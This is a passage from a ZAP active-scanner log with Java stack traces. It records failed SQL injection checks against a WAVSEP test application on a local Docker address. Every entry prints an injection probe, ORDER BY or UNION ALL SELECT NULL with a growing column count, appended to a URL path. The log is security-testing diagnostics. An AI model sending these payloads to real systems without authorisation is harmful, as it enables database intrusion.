org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963037 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8963038 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' ORDER BY 6882#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' ORDER BY 6882# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8963039 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963041 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963042 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963044 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963047 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963049 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963050 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963052 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963053 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963055 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963056 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at 